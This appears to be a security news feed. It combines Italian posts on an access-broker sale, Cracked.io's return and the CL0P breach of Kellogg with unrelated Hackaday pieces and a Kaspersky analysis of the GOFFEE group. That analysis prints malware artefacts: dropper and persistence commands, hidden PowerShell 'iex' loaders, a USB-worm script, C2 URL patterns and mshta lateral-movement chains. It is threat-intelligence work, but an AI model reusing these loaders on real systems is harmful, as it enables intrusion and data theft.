Nelle ultime ore è comparso su sul noto forum underground chiuso in lingua russa XSS un annuncio particolarmente interessante pubblicato dall’utente redblueapple2. L’inserzione propone la vendita di accesso amministrativo a un’infrastruttura aziendale italiana operante nella produzione cartaria, con un fatturato dichiarato di circa 10 milioni di dollari.

L’accesso offerto include credenziali di Domain Admin, con la possibilità di ottenere ulteriori credenziali, accesso remoto tramite AnyDesk, e una vasta quantità di dati aziendali, stimati in almeno 700 GB su un singolo host, oltre a numerosi database su altri server. L’inserzione segnala anche la presenza di Trend Micro AV (antivirus) su alcuni sistemi, ma non su tutta la rete. La rete interessata comprende diversi segmenti /24 (tipiche classi di sottoreti IP).

Il prezzo richiesto è 10.000 dollari, con la possibilità di trattativa.

Analisi della Criticità e affidabilità del Threat Actors

Se questa offerta fosse reale e concreta, le conseguenze per l’azienda sarebbero gravissime:

• Compromissione Totale: Il possesso di un account Domain Admin consente il controllo assoluto della rete: gestione utenti, dispositivi, accessi, policy di sicurezza.
• Furto e Diffusione di Dati Sensibili: I 700 GB di dati, più i database distribuiti su altri server, rappresentano un’enorme esposizione di dati industriali, finanziari e personali.
• Minaccia di Ransomware: Gli accessi venduti potrebbero essere utilizzati per lanciare attacchi ransomware devastanti.
• Attacchi Persistenti (APT): L’ampia esposizione e il controllo sugli endpoint permettono la creazione di backdoor e meccanismi di persistenza a lungo termine.
• Possibili Ripercussioni Legali: In caso di violazione dei dati personali (GDPR), l’azienda rischia multe pesanti e danni reputazionali irreparabili.

L’autore dell’annuncio, redblueapple2, si è registrato a gennaio 2023 e ha una bassa attività (10 post, nessuna reazione). Questo solleva alcuni dubbi:

• Pro: Annuncio dettagliato, informazioni tecniche abbastanza precise.
• Contro: Poca storia verificabile; potrebbe essere un tentativo di scam (truffa) o un annuncio di accessi già compromessi da altri e rivenduti.

Nei forum underground, la credibilità degli Initial Access Broker (IAB) è fondamentale: i venditori consolidati pubblicano prove di accesso (screenshot di sistemi interni, liste di host, ecc.), accettano escrow (servizi di deposito a garanzia) e ricevono feedback positivi. Questo annuncio, per ora, non mostra tali prove pubbliche.

Conclusioni

Gli Initial Access Broker (IAB) sono figure chiave nell’ecosistema cybercriminale. Il loro compito è ottenere accessi a reti aziendali (tramite phishing, exploit, vulnerabilità RDP, ecc.) e rivenderli ad altri attori malintenzionati, come:

• Gruppi ransomware, che utilizzano gli accessi per criptare dati e chiedere riscatti.
• Criminali finanziari, per furti di dati bancari o carte di credito.
• Spie industriali, per il furto di proprietà intellettuale.
• Altri broker, per “catene” di rivendita.

Gli IAB riducono i tempi e i costi di un attacco, permettendo ai gruppi specializzati di concentrarsi sulle fasi più redditizie (esfiltrazione, ransomware deployment, estorsione).

Questo tipo di annuncio sottolinea ancora una volta l’importanza di rafforzare la sicurezza interna, implementare monitoraggi avanzati delle reti, controllare rigorosamente gli accessi remoti, e mantenere antivirus e sistemi sempre aggiornati. Se confermato, l’accesso venduto rappresenta una minaccia seria non solo per l’azienda specifica, ma anche per l’intero ecosistema economico e industriale italiano.

L'articolo Una Azienda italiana Sta per essere Violata! Accesso in vendita e revenue da 10 milioni di dollari proviene da il blog della sicurezza informatica.

Abbiamo spesso su Red Hot Cyber ripetuto questa frase: ‘Combattere il cybercrime è come estirpare le erbacce: se lasci le radici, ricresceranno.’ Oggi, più che mai, questa verità si conferma essere vera.

Il 29 gennaio 2025 è stato un giorno che ha lasciato il segno nell’underground digitale: Crack.io, uno dei forum più popolari del panorama hacking e cracking, è caduto sotto il fuoco dell’ennesima operazione internazionale. Operazione Talent – così l’hanno battezzata – non puntava solo a colpire un’infrastruttura, ma a spegnere per sempre una comunità. Non c’è riuscita.

Cracked.io (alias Cracked.sh) è tornato. E, per ora, è qui per restare.

Dopo settimane di silenzio, oggi Crack.io (ora Cracked.sh) è tornato online. Non è una resurrezione improvvisata: dietro il ritorno, c’è stato un lavoro mirato, un periodo di riflessione, e – come dichiarato nel messaggio ufficiale dell’amministrazione – un’importante ristrutturazione del backend, a partire dalla Shoutbox fino al sistema di pagamento, attualmente in fase di transizione.

Il punto centrale, ovviamente, è la sicurezza. I server sequestrati erano cifrati. Tradotto: post, credenziali e messaggi privati non sono finiti in mano a nessuno. Un colpo di fortuna? No, semplice pratica di buon senso (che spesso, però, manca). Tuttavia, l’admin non fa promesse: nel clearweb non esistono garanzie al 100%. Ecco perché l’invito a cambiare password o cancellare i messaggi privati, per chi volesse dormire sonni più tranquilli.

Nuova leadership, vecchia community

L’amministratore ha ora un nuovo “volto”: @Liars, che ha preso le redini della piattaforma. Sarà lui il punto di riferimento per chiunque voglia ripristinare gli upgrade o i crediti acquistati dopo il 25 gennaio (data dell’ultimo backup recuperabile), oppure effettuare nuovi acquisti – per ora, solo via messaggio privato.

Chi conosce il mondo dei forum sa bene che una transizione del genere può segnare un prima e un dopo. Ma Crack.io non è un semplice sito: è una comunità, spesso controversa, sicuramente discussa, ma altrettanto resiliente.

Nei prossimi giorni sono attesi fix continui: ogni bug segnalato sarà affrontato, nel tentativo di rendere l’esperienza utente il più fluida possibile, in un contesto che di fluido – per sua stessa natura – ha ben poco. Nel frattempo, la parola d’ordine è una sola: manualità. Chi vuole qualcosa, lo chiede direttamente. Vecchia scuola? Forse. Ma anche una delle poche strategie efficaci in un contesto dove ogni script automatizzato è potenzialmente una porta aperta.

Il ritorno di Crack.io (pardon, Cracked.sh) non è solo una questione tecnica: è una dichiarazione. Dichiarazione di resilienza, di sfida, e per alcuni anche di sopravvivenza. Il gioco del gatto e del topo tra law enforcement e comunità underground continua, e oggi il topo si è rimesso in piedi.

Dubbi e sospetti: Cracked.io controllato dai federali?

Come spesso accade in casi di “rinascite” così improvvise e ben orchestrate, non mancano le ipotesi più controverse. In un thread pubblicato su BreachForums, l’utente Synaptic ha sollevato un dubbio pesante:

“And it’s probably operated by the feds themselves. I see they’re using a backup and not going from scratch, so that’s something.”

L’osservazione è lucida: perché ripartire da un backup invece di ricostruire da zero? Per alcuni, questo può rappresentare un potenziale segnale di operazione sotto copertura, ipotizzando che l’intera infrastruttura possa oggi essere in mano all’FBI o ad altri enti governativi, con finalità di tracciamento e indagine.

Naturalmente, si tratta di speculazioni. Ma nel mondo dell’underground digitale, la paranoia non è un bug: è una feature. E anche la rinascita di Crack.io dovrà fare i conti con una fiducia da riconquistare, un utente alla volta.

La vera domanda, ora, non è se il forum sopravviverà. Ma per quanto.

L'articolo La Rinascita di Crack.io: Combattere il cybercrime è come estirpare erbacce: se lasci le radici, ricresceranno proviene da il blog della sicurezza informatica.

If you paid attention to advertising in 1980s Britain, you were never far from Economy 7. It was the magic way to heat your house for less, using storage heaters which would run at night using cheap electricity, and deliver warmth day-long. Behind it all was an unseen force, a nationwide radio switching signal transmitted using the BBC’s 198 kHz Long Wave service. Now in 2025 the BBC Radio 4 Long Wave service it relies on is to be turned off, rendering thousands of off-peak electricity meters still installed, useless. [Ringway Manchester] is here to tell the tale.

The system was rolled out in the early 1980s, and comprised of a receiver box which sat alongside your regular electricity meter and switched in or out your off-peak circuit. The control signal was phase-modulated onto the carrier, and could convey a series of different energy use programs. 198 kHz had the useful property due to its low frequency of universal coverage, making it the ideal choice. As we’ve reported in the past the main transmitter at Droitwich is to be retired due to unavailability of the high-power vacuum tubes it relies on, so now time’s up for Economy 7 too. The electricity companies are slow on the uptake despite years of warning, so there’s an unseemly rush to replace those old meters with new smart meters. The video is below the break.

The earliest of broadcast bands may be on the way out, but it’s not entirely over. There might even be a new station on the dial for some people.

youtube.com/embed/DEjDdtCRNlQ?…

hackaday.com/2025/04/10/farewe…

Once the domain of esoteric scientific and business computing, floating point calculations are now practically everywhere. From video games to large language models and kin, it would seem that a processor without floating point capabilities is pretty much a brick at this point. Yet the truth is that integer-based approximations can be good enough to hit the required accuracy. For example, approximating floating point multiplication with integer addition, as [Malte Skarupke] recently had a poke at based on an integer addition-only LLM approach suggested by [Hongyin Luo] and [Wei Sun].

As for the way this works, it does pretty much what it says on the tin: adding the two floating point inputs as integer values, followed by adjusting the exponent. This adjustment factor is what gets you close to the answer, but as the article and comments to it illustrate, there are plenty of issues and edge cases you have to concern yourself with. These include under- and overflow, but also specific floating point inputs.

Unlike in scientific calculations where even minor inaccuracies tend to propagate and cause much larger errors down the line, graphics and LLMs do not care that much about float point precision, so the ~7.5% accuracy of the integer approach is good enough. The question is whether it’s truly more efficient as the paper suggests, rather than a fallback as seen with e.g. integer-only audio decoders for platforms without an FPU.

Since one of the nice things about FP-focused vector processors like GPUs and derivatives (tensor, ‘neural’, etc.) is that they can churn through a lot of data quite efficiently, the benefits of shifting this to the ALU of a CPU and expecting (energy) improvements seem quite optimistic.

hackaday.com/2025/04/10/using-…

While some companies like Apple have gone all-in on the ARM architecture, others are more hesitant to dive into the deep end. For example, Microsoft remains heavily invested in the x86 architecture and although it does have some ARM offerings, a lot of them feel a bit half-baked. So you might question why someone like [Gustave] has spent so much time getting Windows to run on unusual ARM platforms. But we don’t need much of a reason to do something off-the-wall like that around these parts, so take a look at his efforts to get Windows for ARM running on a smartwatch.

The smartwatch in question here is a Pixel Watch 3, which normally runs a closed-source Android implementation called Wear OS. The bootloader can be unlocked, so [Gustave] took that approach to implement a few clever workarounds to get Windows to boot including adding UEFI to the watch. During the process Google updated these devices to Android 15, though, which broke some of these workarounds. The solution at that point was to fake a kernel header and re-implement UEFI and then load Windows (technically Windows PE) onto the watch.

Although this project was released on April 1, and is by [Gustave]’s own admission fairly ridiculous and not something he actually recommends anyone do, he does claim that it’s real and provides everything needed for others to run Windows on their smartwatches if they want to. Perhaps one of our readers will be brave enough to reproduce the results and post about it in the comments. In the meantime, there are a few more open options for smartwatches available if you’re looking for something to tinker with instead.

Thanks to [Ruhan] for the tip!

hackaday.com/2025/04/10/window…

As computers age, a dedicated few work towards keeping some of the more interesting ones running. This is often a losing battle of sorts, as the relentless march of time comes for us all, human and machine alike. So as fewer and fewer of these machines remain new methods are needed to keep them running as best they can. [CallousCoder] demonstrates a way of building up a new keyboard for a Commodore 64 which both preserves the original look and feel of the retro computer but also adds some modern touches.

One of the main design differences between many computers of the 80s and modern computers is that the keyboard was often built in to the case of the computer itself. For this project, that means a custom 3D printed plate that can attach to the points where the original keyboard would have been mounted inside the case of the Commodore. [CallousCoder] is using a print from [Wolfgang] to get this done, and with the plate printed and a PCB for the keys it was time to start soldering. The keyboard uses modern switches and assembles like most modern keyboards do, with the exception of the unique layout for some of the C64 keys including a latching shift key, is fairly recognizable for anyone who has put together a mechanical keyboard before.

[CallousCoder] is using the original keycaps from a Commodore 64, so there is an additional step of adding a small adapter between the new switches and the old keycaps. But with that done and some amount of configuring, he has a modern keyboard that looks like the original. If you’re more a fan of the original hardware, though, you can always take an original C64 keyboard and convert it to USB to use it on your modern machines instead.

youtube.com/embed/fT9_SzN4JhA?…

hackaday.com/2025/04/10/a-new-…

Ion thrusters are an amazing spacecraft propulsion technology, providing very high efficiency with relatively little fuel. Yet getting one to produce more thrust than that required to lift a sheet of A4 paper requires a lot of electricity. This is why they have been only used for applications where sustained thrust and extremely low fuel usage are important, such as the attitude management of satellites and other spacecraft. Now researchers in New Zealand have created a prototype magnetoplasmadynamic (MPD) thruster with a superconducting electromagnet that is claimed to reduce the required input power by 99% while generating a three times as strong a magnetic field.

Although MPD thrusters have been researched since the 1970s – much like their electrostatic cousins, Hall-effect thrusters – the power limitations on the average spacecraft have limited mission profiles. Through the use of a high-temperature superconducting electromagnet with an integrated cryocooler, the MPD thruster should be able to generate a very strong field, while only sipping power. Whether this works and is as reliable as hoped will be tested this year when the prototype thruster is installed on the ISS for experiments.

hackaday.com/2025/04/10/improv…

Il nome WK Kellogg Co. è sinonimo di colazione in milioni di case americane. Ma oggi, quel nome è finito sotto i riflettori per tutt’altri motivi: un data breach importante ha colpito l’azienda, con dati personali dei dipendenti trafugatida un attore ben noto nel panorama cybercriminale: il gruppo ransomware CL0P.

L’attacco è avvenuto il 7 dicembre 2024, ma incredibilmente è stato scoperto quasi tre mesi dopo, il 27 febbraio 2025. Un vuoto temporale inquietante, che solleva interrogativi sull’efficacia dei controlli di sicurezza e sul monitoraggio delle infrastrutture digitali.

La dinamica dell’attacco: la porta d’ingresso? Cleo

Il gruppo CL0P ha colpito sfruttando vulnerabilità zero-day nella piattaforma di file transfer del fornitore Cleo, utilizzata da WK Kellogg Co. per trasferire file contenenti dati personali identificabili (PII) verso i fornitori di servizi HR. Nomi, numeri di previdenza sociale e altre informazioni altamente sensibili dei dipendenti sono stati esfiltrati silenziosamente dai server violati.

In un documento ufficiale di regolamentazione inviato all’ufficio del Procuratore Generale del Maine, WK Kellogg Co. ha confermato che almeno un dipendente è stato colpito dal hack, che si è verificato a dicembre 2024 a causa di una vulnerabilità nel software di trasferimento file di Cleo.

Il 25 febbraio 2025, il gruppo CL0P ha pubblicato l’incidente sul Dark Web, mettendo pressione mediatica e commerciale sull’azienda.

Solo il 4 aprile 2025, WK Kellogg Co. ha notificato ufficialmente la violazione alle autorità statali e avviato le comunicazioni agli interessati.

Terze parti: anello debole della catena

Ancora una volta, l’anello debole della catena di sicurezza si è rivelato essere un fornitore esterno. Le organizzazioni troppo spesso si illudono che la sicurezza termini al confine della propria rete.

Il caso Kellogg ci ricorda quanto sia fondamentale:

• Assicurarsi che i fornitori adottino misure di sicurezza robuste, inclusi protocolli di autenticazione multifattoriale (MFA).
• Verificare regolarmente la sicurezza dei fornitori attraverso test di penetrazione e audit.
• Gestire correttamente le patch di sicurezza, soprattutto per i software di trasferimento file.

Conclusione

Questo non è solo un altro data breach: è un campanello d’allarme per tutte le aziende che si affidano a fornitori esterni per la gestione dei dati sensibili. L’incidente che ha coinvolto WK Kellogg Co. mette in evidenza come la sicurezza non possa più essere delegata, ma deve essere una priorità condivisa tra tutte le parti coinvolte.

Per i dipendenti di Kellogg, il rischio è reale: furto di identità, frodi finanziarie e attacchi di phishing mirato. Per l’azienda, l’impatto va ben oltre i dati persi: c’è un danno reputazionale, economico e una falla nella protezione della privacy dei propri lavoratori.

In un mondo in cui la supply chain digitale è sempre più complessa e interconnessa, ogni azienda deve alzare il livello di guardia e garantire che tutti i suoi partner e fornitori rispettino gli stessi standard di sicurezza. L’incidente di Kellogg è una chiara lezione: la protezione delle informazioni sensibili è una responsabilità collettiva, e ogni anello della catena deve essere forte quanto l’anello più debole.

L'articolo Kellogg’s: il gruppo ransomware CL0P buca i server del fornitore Cleo e ruba dati sensibili proviene da il blog della sicurezza informatica.

Is a bicycle like a motorcycle? Of course, the answer is it is and it isn’t. Saying something is “like” something else presupposes a lot of hidden assumptions. In the category “things with two wheels,” we have a winner. In the category “things that require gasoline,” not so much. We’ve noticed before that news stories about astronomy often talk about “sun-like stars” or “Earth-like planets.” But what does that really mean? [Paul Gilster] had the same questions, if you want to read his opinion about it.

[Paul] mentions that even textbooks can’t agree. He found one that said that Centauri A was “sun-like” while Centauri B was sometimes considered sun-like and other times not. So while Paul was looking at the examples of press releases and trying to make sense of it all, we thought we’d just ask you. What makes a star like our sun? What makes a planet like our planet?

Part of the problem is we don’t really know as much as we would like about other planets and their stars. We know more than we used to, of course. Still, it would be like wondering if the motorcycle was like that distant point of light. Maybe.

This is one of those things that seems deceptively simple until you start thinking about it. Is a planet Earth-like if it is full of water? What if it is totally covered in water? What if there’s no life at all? But life isn’t it, either. Methane-breathing silicon-based life probably doesn’t live on Earth-like planets.

Maybe Justice Potter Stewart was on to something when he said, “I know it when I see it!” Unfortunately, that’s not very scientific.

So what do you think? What’s a sun-like star? What’s an Earth-like planet? Discuss in the comments.

Don’t even get us started on super-earths, whatever they are. We are learning more about our neighbors every day, though.

hackaday.com/2025/04/10/ask-ha…

Around these parts, we generally celebrate clever hacks that let you do more with less. So if somebody wrote in to tell us how they used multiplexing to drive the front panel of their latest gadget with fewer pins on the microcontroller than would normally be required, we’d be all over it. But what if that same hack ended up leading to a common failure in a piece of consumer hardware?

As [Jim] recently found out, that’s precisely what seems to be ailing the Meaco Arete dehumidifier. When his stopped working, some Internet searching uncovered the cause of the failure: if a segment in the cheap LED display dies and shorts out, the multiplexing scheme used to interface with the front panel essentially reads that as a stuck button and causes the microcontroller to lock up. He passed the info along to us as a cautionary tale of how over-optimization can come with a hidden cost down the line.

Judging by the thread from the Badcaps forum, the problem was identified last summer. But unless you had this particular dehumidifier and went searching for it, it’s not the kind of thing that you’d otherwise run into. The users start by going through the normal diagnostic steps, but come up short (no pun intended).
Given its simplicity, the front panel PCB was not an obvious failure point.
Eventually, user [CG2] resorts to buzzing out all the connections to the two digit seven-segment LED display on the front panel, and finds a dead short on one of the segments. After removing the display, the dehumidifier sprung back to life and everything worked as expected. It wasn’t hard to identify a suitable replacement display on AliExpress, and swapping it out brought the appliance back up to full functionality.

Now to be fair, a shorted out component is likely to cause havoc wherever it might be in the circuit, and as such perhaps it’s the lowest-bidder LED display with the unusually high failure rate that’s really to blame here. But it’s also more likely you’d interpret a dark display as a symptom of the problem rather than the cause, making this a particularly tricky failure to identify.

In any event, judging by how many people seem to be having the same problem, and the fact that there’s now an iFixit guide on how to replace the shorted display, it seems like this particular product was cost-optimized just a bit too far.

hackaday.com/2025/04/10/clever…

GOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed malicious activities targeting exclusively entities located in the Russian Federation, leveraging spear phishing emails with a malicious attachment. Starting in May 2022 and up until summer of 2023, GOFFEE deployed modified Owowa (malicious IIS module) in their attacks. As of 2024, GOFFEE started to deploy patched malicious instances of explorer.exe via spear phishing.

During the second half of 2024, GOFFEE continued to launch targeted attacks against organizations in Russia, utilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that we dubbed “PowerModul”. The targeted sectors included media and telecommunications, construction, government entities, and energy companies.

This report in a nutshell:

• GOFFEE updated distribution schemes.
• A previously undescribed implant dubbed PowerModul was introduced.
• GOFFEE is increasingly abandoning the use of PowerTaskel in favor of a binary Mythic agent for lateral movement.

For more information, please contact: intelreports@kaspersky.com

Technical details

Initial infection

Currently, several infection schemes are being used at the same time. The starting point is typically a phishing email with a malicious attachment, but the schemes diverge slightly from there. We will review two of them relevant at the time of the research.

The first infection scheme uses a RAR archive with an executable file masquerading as a document. In some cases, the file name uses a double extension, such as “.pdf.exe” or “.doc.exe”. When the user clicks the executable file, a decoy document is downloaded from the C2 and opened, while malicious activity is carried out in parallel.

Example of decoy document

The file itself is a Windows system file (explorer.exe or xpsrchvw.exe), with part of its code patched with a malicious shellcode. The shellcode is similar to what we saw in earlier attacks, but in addition contains an obfuscated Mythic agent, which immediately begins communicating with the command-and-control (C2) server.

Malware execution flow v1

In the second case, the RAR archive contains a Microsoft Office document with a macro that serves as a dropper.

Malware execution flow v2

Malicious document with a macro

When a document is opened, scrambled text and a warning image with the message, “This document was created in an earlier version of Microsoft Office Word. For Microsoft Office Word to display the contents correctly, click ‘Enable Content'”, are shown. Clicking “Enable Content” activates a macro that hides the warning image and restores the text through a normal character replacement operation. Additionally, the macro creates two files in the user’s current folder: an HTA and a PowerShell file, and writes the HTA into the registry using the “LOAD” registry value of the “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows” registry key.
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
"LOAD"="C:\Users\<USER_NAME>\UserCache.ini.hta"
Although the macro itself does not start anything or create new processes, the programs listed in the “LOAD” value of the registry key are run automatically for the currently logged-on user.

UserCache.ini.hta content

The malicious HTA runs a PowerShell script (PowerModul), but not directly. Instead, it first uses cmd.exe and output redirection to drop a JavaScript file named “UserCacheHelper.lnk.js” onto the disk, and then executes it. Only then does the dropped JavaScript run PowerModul:
cmd.exe /c if not exist "C:\Users\user\UserCacheHelper.lnk.js" echo var objService = GetObject("winmgmts:\\\\.\\root\\cimv2");var objStartup = objService.Get("Win32_ProcessStartup");var objConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass = objService.Get("Win32_Process");var command = "powershell.exe -c \"$raw= Get-Content C:\\Users\\user\\UserCache.ini;Invoke-Expression $raw\"";var result = processClass.Create(command, null, objConfig, 0); > C:\Users\user\UserCacheHelper.lnk.js
It is worth noting that “UserCache.ini.hta” and “UserCacheHelper.lnk.js” contain strings with full paths to the files, including the local user’s name, instead of environment variables. As a result, the control keys, as well as the file sizes, will vary depending on the current user’s name.

UserCacheHelper.lnk.js content

The “UserCacheHelper.lnk.js” file launches a PowerShell file named “UserCache.ini”, dropped by the initial macro. This file contains encoded PowerModul.

PowerModul

PowerModul is a PowerShell script capable of receiving and executing additional PowerShell scripts from the C2 server. The first instances of this implant’s usage were detected at the beginning of 2024. Initially, it was used to download and launch the PowerTaskel implant, and was considered a relatively minor component for launching PowerTaskel. However, its use of a unique protocol, distinct payload types, and a C2 server different from PowerTaskel’s led us to classify it as a separate family.

UserCache.ini content

In the scheme being described, the PowerModul code is embedded in the “UserCache.ini” file as a Base64-encoded string. The beginning and end of the decoded script are shown in the images below, while the middle section contains a copy of the HTA file, as well as code responsible for dropping the HTA file onto the disk, writing it to the registry, and hiding the file by changing its attributes to “Hidden”. Essentially, this code replicates part of the functionality of the VBA macro found in the Word document, except for file hiding, which was not implemented in VBA.

Beginning of PowerModul

End of PowerModul

When accessing the C2, PowerModul appends an infected system identifier string to the C2 URL, consisting of the computer name, username, and disk serial number, separated with underscores:
hxxp://62.113.114[.]117/api/texts/{computer_name}_{username}_{serial_number}
The response from the C2 is in XML format, complete with scripts encoded in Base64:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/plain
Content-Length: 35373
Connection: keep-alive

<Configs>
<Config>
<Module>ZnVuY3Rpb24gQ3JlYXRlVkJTRmlsZSgkYkJkcmxzRCwgJGlMc1FybVQsIC....==</Module>
<CountRuns>250</CountRuns>
<Interval>1</Interval>
</Config>
<Config>
<Module>ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9I...</Module>
There is an additional, previously undescribed function in PowerModul, named “OfflineWorker()”. It decodes a predefined string and executes its contents. In the instance shown in the screenshots above, the string to be decoded is empty, and therefore, nothing is executed. However, we have observed cases where the string contained content. An example of the OfflineWorker() function containing the FlashFileGrabber data stealing tool code is shown below:
function OfflineWorker() {
try{
$___offlineFlash = 'ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9IE…….=';

if($___offlineFlash -ne ''){
$___flashOfflineDecoded = FromBase64 $___offlineFlash;
Invoke-Expression($___flashOfflineDecoded);
}
}
catch{}
}
The payloads used by PowerModul include the PowerTaskel, FlashFileGrabber, and USB Worm tools.

FlashFileGrabber

As its name suggests, FlashFileGrabber is designed to steal files from removable media, such as flash drives. We have identified two variants: FlashFileGrabber and FlashFileGrabberOffline.

FlashFileGrabberOffline main routine

FlashFileGrabberOffline searches removable media for files with specific extensions, and when found, copies them to the local disk. To accomplish this, it creates a series of subdirectories in the TEMP folder, following the template “%TEMP%\CacheStore\connect\<VolumeSerialNumber>\”. The folder names “CacheStore” and “connect” are hardcoded within the script. Examples of such paths are provided below:
%TEMP%\CacheStore\connect\62431103\2024\some.pdf
%TEMP%\CacheStore\connect\62431103\Documents\some.docx
%TEMP%\CacheStore\connect\62431103\attachment.jpg
%TEMP%\CacheStore\connect\6c1d1372\Print\resume.docx
Additionally, a file named “ftree.db” is created at the path specified in the template, which stores metadata for the copied files, including the full path to the original file, its size, and dates of last access and modification. Furthermore, in the “%AppData%” folder, the “internal_profiles.db” file is created, storing the MD5 sums of the aforementioned metadata. This allows the malware to avoid copying the same files more than once:
%TEMP%\CacheStore\connect\<VolumeSerialNumber>\ftree.db
%AppData%\internal_profiles.db
The list of file extensions of interest is as follows:

FlashFileGrabber largely duplicates the functionality of FlashFileGrabberOffline, but with one key difference: it is capable of sending files to the C2 server.

FlashFileGrabber’s routines

USB Worm

USB Worm is capable of infecting removable media with a copy of PowerModul. To achieve this, the worm renames the files on the removable disk with a random name, retaining their original extension, and assigns them the “Hidden” file attribute. The “UserCache.ini” file, which contains PowerModul, is then copied to the folder with the original file.

USB Worm main routine

Additionally, the worm creates hidden VBS and batch files to launch PowerModul and open a decoy document.

CreateVBSFile() and CreateBatFile() functions

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run Chr(34) & ".\zermndzg.bat" & Chr(34), 0, False
WshShell.Run Chr(34) & ".\zermndzg.docx" & Chr(34), 1, False
Set WshShell = Nothing
Example of the contents of a malicious VBS
powershell -exec bypass -windowstyle hidden -nop -c "$raw= [io.file]::ReadAllText(""".\UserCache.ini"""); iex $raw;"
Example of the contents of a malicious batch file

A shortcut is also created with the original name of the decoy document, which, when launched, executes the VBS file.

CreateShortcutForFile() function

To disguise the shortcut, the worm assigns an icon from the shell32.dll library, depending on the extension of the original file. The worm limits the number of documents replaced with shortcuts to five, selecting only the most recently accessed files by sorting them according to their LastAccessTime attribute.

System infection scheme via removable media

PowerTaskel

We have dubbed the non-public PowerShell Mythic agent delivered via a mail-based infection chain since early 2023, as PowerTaskel. This implant possesses only two primary capabilities: sending information about the targeted environment to a C2 server in the form of a “checkin” message, and executing arbitrary PowerShell scripts and commands received from the C2 server as “tasks” in response to “get_tasking” requests from the implant. The request payloads are PowerShell objects that are serialized to XML, encoded using XOR with a sample-specific 1-byte key, and then converted to Base64.

Based on the naming and ordering of the configuration parameters, it is likely that PowerTaskel is derived from the open-source Medusa Mythic agent, which was originally written in Python.

Comparison of Medusa and PowerTaskel configuration code

Comparison of Medusa and PowerTaskel “checkin” function code

PowerTaskel is a fully functional agent capable of executing commands and PowerShell scripts, which expand its capabilities to downloading and uploading files, running processes, etc. However, its functionality is often insufficient due to specific aspects of PowerShell usage, prompting the group to switch to a custom binary Mythic agent. To achieve this, PowerTaskel loads the Mythic agent from the C2 server, injects it into its own process memory, and runs it in a separate thread. In this scenario, the Mythic agent is present as a self-configuring x32/x64 shellcode. The method of injecting and loading the Mythic agent shellcode is described in more detail in the “Lateral Movement” section.

In at least one instance, PowerTaskel received a script containing a FolderFileGrabber component as a task. FolderFileGrabber largely replicates the functionality of FlashFileGrabber, with one key difference: it can grab files from remote systems via a hardcoded network path using the SMB protocol. The PowerShell cmdlet “New-SmbMapping” is used to access remote system resources, enabling successful retrieval of the desired files.

Lateral movement

Following system infection, if the user account permissions allow it, PowerTaskel performs several tasks to elevate its privileges to the System level. To achieve this, PowerTaskel utilizes the PsExec utility, which is part of the Sysinternals suite. The PsExec utility is dropped into the current directory where PowerTaskel is located and is used to execute mshta.exe with system privileges, passing a URL as an argument.

The images below depict two tasks that PowerTaskel executes with its C2 server. The first task checks for the presence of the file “ntuser.exe” in the %ProgramData% directory, and if it is not found, downloads it from the C2 server. The second task runs mshta.exe via ntuser.exe, which is actually a renamed PsExec utility.

Getting “ntuser.exe”

The “ntuser.exe” executable running “mshta.exe”

The next image illustrates an example of the execution flow of various scripts and commands started with the privilege elevation procedure. The executable file “1cv9.exe” is a renamed PsExec utility, and the argument “-s” specifies that the process it launches should run under the System account. The launched program “mshta.exe” accepts a URL as an argument, which points to an HTA file containing malicious, obfuscated JScript. The HTA file is cached and saved to the InetCache folder. This JScript creates two files, “desktop.js” and “user.txt”, on the disk using the “echo” console command with output redirection to a file, and then executes desktop.js via cscript.exe. The desktop.js file, in turn, launches the interpreter with a script on the command line, which reads the contents of user.txt and executes it. As evident from the contents passed to the “echo” command, user.txt is another PowerShell script whose task is to extract a payload from a hardcoded address and execute it. In this case, the payload is PowerTaskel, which now runs with the elevated privileges.

Example of execution flow on an infected system

Once launched, PowerTaskel interacts with its C2 server and executes standard commands to gather information about the system and environment. Notably, the launch of csc.exe (Visual C# Command Line Compiler) indicates that PowerTaskel has received a task to load a shellcode, which it accomplishes using an auxiliary DLL. The primary function of this DLL is to copy the shellcode into allocated memory. In our case, the shellcode is self-configuring code for the binary Mythic agent.

The final line of the execution flow (“hxxp://192.168.1[.]2:5985/wsman”) reveals a call to the WinRM (Microsoft Windows Remote Management) service, located on a remote host on the local network, via the loaded Mythic agent. A specific User-Agent header value, “Ruby WinRM Client”, is used to access the WinRM service.

HTTP header for WinRM request

The WinRM service is actively utilized by GOFFEE for network distribution purposes. Typically, this involves launching the mshta.exe utility on the remote host with a URL as an argument. The following examples illustrate the execution chains observed on remote hosts:
wmiprvse.exe -secured -Embedding
-> cmd.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wsmprovhost.exe
-> mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> cmd.exe /Q /c powershell.exe mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> powershell.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta
Recently, we have observed that GOFFEE is increasingly abandoning the use of PowerTaskel in favor of the binary Mythic agent during lateral movement.

Mythic agent HTA

The mshta.exe utility is still employed to launch the binary Mythic agent, with a URL passed as an argument. However, the payload contents for the passed URL differ from the traditional HTA format. It is relatively large, approximately 180 kilobytes, and is characterized as a polyglot file, which is a type of file that can be validly interpreted in multiple formats. The shellcode containing the Mythic agent is located at the beginning of the file and occupies approximately 80% of its size. It is followed by two Base64-encoded PowerShell scripts, separated by a regular line break, and finally, the HTA file itself.

Polyglot payload

When the mshta.exe utility downloads the aforementioned payload, it interprets it as an HTA file and transfers control to an obfuscated JScript embedded within the HTA section of the polyglot file. The script first determines the argument used to launch the mshta.exe utility, whether it was a URL or a path to a local file. If a URL was used as the argument, the script searches for the original HTA file in the InetCache folder, where the system cached the HTA file during download. To do this, the script iterates through all files in the cache folder and checks their contents for the presence of a specific magic string.

Deobfuscated JScript from the HTA section of the payload

